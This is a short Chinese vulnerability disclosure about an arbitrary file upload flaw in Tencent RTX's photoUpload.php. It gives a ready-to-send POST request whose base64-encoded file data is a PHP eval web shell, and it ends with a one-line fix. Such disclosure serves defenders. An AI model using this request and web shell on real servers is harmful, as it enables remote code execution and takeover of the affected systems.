安全基础知识

腾讯RTX上传任意文件及修复

安装RTX后打开IP:8012网址

腾讯RTX存在UserPhoto/photoUpload.php任意文件上传漏洞
详细说明:
简单的一个post表单即可上传
$user_account = $_POST['user_account'];
$file_name = $_POST["file_name"];
$file_data = $_POST["file_data"];

 

无任何过滤
漏洞证明:
user_account=1000
file_name=s.php
file_data=PD9waHAgZXZhbCgkX1BPU1Rbc2JdKT8+
file_data为base64_encode数据
post提交后UserPhoto目录下生成PhotoFiles/s.php

 

需要extension=php_mbstring.dll开启及php4
修复方案:
上传过滤

全国客服电话: 400-001-7880
值班技术:
13330159245

                       

扫一扫,咨询客服